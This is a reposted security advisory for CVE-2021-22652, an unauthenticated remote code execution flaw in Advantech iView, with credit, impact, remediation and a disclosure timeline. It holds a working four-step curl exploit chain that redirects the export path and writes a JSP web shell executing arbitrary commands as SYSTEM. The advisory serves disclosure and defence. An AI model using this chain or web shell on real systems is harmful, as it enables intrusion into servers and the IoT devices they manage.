CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Click the icon to Follow me:- twitterTelegramRedditDiscord
CVE-2021-22652: Advantech iView Missing Authentication RCE (FIXED)

Advantech iView versions prior to 5.7.03.6112 suffer from an instance of “CWE-306: Missing Authentication For Critical Function.” This vulnerability (CVE-2021-22652) has a CVSSv3 score of 9.8, which is usually CRITICAL, since it effectively allows anyone who can connect to the iView server to run arbitrary, OS-level commands in the user context of the iView application, which is nearly always SYSTEM-level access.

Product description

Advantech iView is a proprietary, SNMP-based IoT device management application used to manage deployments of Advantech B+B SmartWorx-enabled products, as described on the vendor’s product site.

Credit

This issue was discovered by Rapid7 Senior Security Researcher William Vu. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy and in cooperation with the Industrial Control Systems Vulnerability Management and Coordination (ICS-VMC) section of the Cybersecurity and Infrastructure Security Agency (CISA), a division of the U.S. Department of Homeland Security.

Exploitation of CVE-2021-22652 (FIXED)

An unauthenticated configuration change combined with an unauthenticated file write primitive leads to an arbitrary file write that allows for remote code execution as the user running iView, which is typically NT AUTHORITYSYSTEM. This issue was demonstrated in the vulnerable version 5.7.02.5992 and fixed in version 5.7.03.6112.

The vulnerability can be demonstrated with the following series of curl(1) commands:

Step 0: Confirm vulnerable version

This is just to confirm that we’re running a vulnerable version.

Note: Replace all instances of [RHOST] with your target IP.

[email protected]:~$ curl -s http://[RHOST]:8080/iView3/MenuServlet -d "page_action_type=getMenuFragment&page=version.frag" | xmllint --html --xpath 'string(//input[starts-with(@value, "Version")]/@value)' - 2> /dev/null | paste -
Version 5.7 (Build 0002.5992)
[email protected]:~$

Version 5.7.02.5992 is detected. This check is unauthenticated.

Step 1: Retrieve iView configuration

This is to ensure we are modifying only the values we need.

[email protected]:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d page_action_type=retrieveSystemSettings | jq -c .[0]
{"PROMPATH":"c:\IMCTrapService\prom_bin\","EXPORTPATH":"c:\IMCTrapService\export\","IMPORTPATH":"c:\IMCTrapService\import\","CONFIGPATH":"c:\IMCTrapService\config\","DBBACKUPPATH":"c:\IMCTrapService\backup\","ZTPTEMPLATESPATH":"c:\IMCTrapService\templates\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}
[email protected]:~$

As you can see, the configuration is returned as a JSON object.

Step 2: Update EXPORTPATH to webappsiView3

A relative path can be used, since the working directory is the Tomcat folder. This saves us from having to choose between C:Program Files and C:Program Files (x86).

[email protected]:~$ curl -s http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=updateSystemSettings&json_obj={"PROMPATH":"c:\IMCTrapService\prom_bin\","EXPORTPATH":"webapps\iView3\","IMPORTPATH":"c:\IMCTrapService\import\","CONFIGPATH":"c:\IMCTrapService\config\","DBBACKUPPATH":"c:\IMCTrapService\backup\","ZTPTEMPLATESPATH":"c:\IMCTrapService\templates\","SSHPORT":"22","TFTPPORT":"69","MAXBACKUPFILES":"3","NETWORKSCANTIMEOUT":"20","USERSESSIONTIMEOUT":"0","USECUSTOMNAMING":"0","CUSTOMNAMETEMPLATE":""}' | jq .[0]
{
  "PROMPATH": "c:\IMCTrapService\prom_bin\",
  "EXPORTPATH": "webapps\iView3\",
  "IMPORTPATH": "c:\IMCTrapService\import\",
  "CONFIGPATH": "c:\IMCTrapService\config\",
  "DBBACKUPPATH": "c:\IMCTrapService\backup\",
  "ZTPTEMPLATESPATH": "c:\IMCTrapService\templates\",
  "SSHPORT": "22",
  "TFTPPORT": "69",
  "MAXBACKUPFILES": "3",
  "NETWORKSCANTIMEOUT": "20",
  "USERSESSIONTIMEOUT": "0",
  "USECUSTOMNAMING": "0",
  "CUSTOMNAMETEMPLATE": ""
}
[email protected]:~$

The updated configuration is, again, returned as a JSON object.

Step 3: Write JSP stub to provide command execution

The JSP decodes to
<%Runtime.getRuntime().exec(request.getParameter("c"));%> and is
written to webappsiView3x.jsp.

[email protected]:~$ curl http://[RHOST]:8080/iView3/NetworkServlet -d 'page_action_type=exportInventoryTable&col_list=<%25Runtime.getRuntime().exec(request.getParameter("c"));%25>-NULL&sortname=NULL&sortorder=&filename=x.jsp'
Export failed.
[email protected]:~$

Note that the returned error is immaterial to the exploit (the export “failed” because the tested instance has no data to export).

Step 4: Execute arbitrary commands

You should now be able to execute arbitrary commands by sending the c parameter to the /iView3/x.jsp script.

Note: Replace [USERNAME] with your desktop user.

[email protected]:~$ curl http://[RHOST]:8080/iView3/x.jsp -d "c=cmd.exe /c whoami > C:Users[USERNAME]Desktopvulnerable.txt"
nul
[email protected]:~$

Similar to Step 3, the nul returned value is immaterial to the exploit.

Vulnerability impact

The attack may be limited by the fact that iView web interfaces are generally not exposed to the internet and that iView is usually deployed as an internal web application. So, an attacker would first need to somehow connect to the iView server. However, since it is a web application, it’s not unthinkable to imagine that there may be a few exposed to the public internet.

Once an attacker has control of the iView server, the attacker can then manage the associated SmartWorx-enabled networked devices, which are typically IoT in nature and can have an effect on that physical infrastructure.

Remediating CVE-2021-22652

This issue was fixed in pre-release version 5.7.03.6112. Users who cannot update right away should ensure the iView web application is not reachable from untrusted networks, such as the internet.

Disclosure timeline

  • Wednesday, Aug. 26, 2020: Issue discovered by William Vu of Rapid7.
  • Thursday, Aug. 27, 2020: Initial disclosure to ICS-CERT via the CISA Service Desk.
  • Monday, Nov. 9, 2020: ICS-CERT confirms receipt and assigns ICS-VU-820719.
  • Friday, Feb. 5, 2021: Draft advisory for ICSA-21-040-02 confirmed by Rapid7.
  • Tuesday, Feb. 9, 2021: ICS Advisory ICSA-21-040-02 published by CISA.
  • Thursday, Feb 11, 2021: Rapid7 details on CVE-2021-22652 published.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Subscribe

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source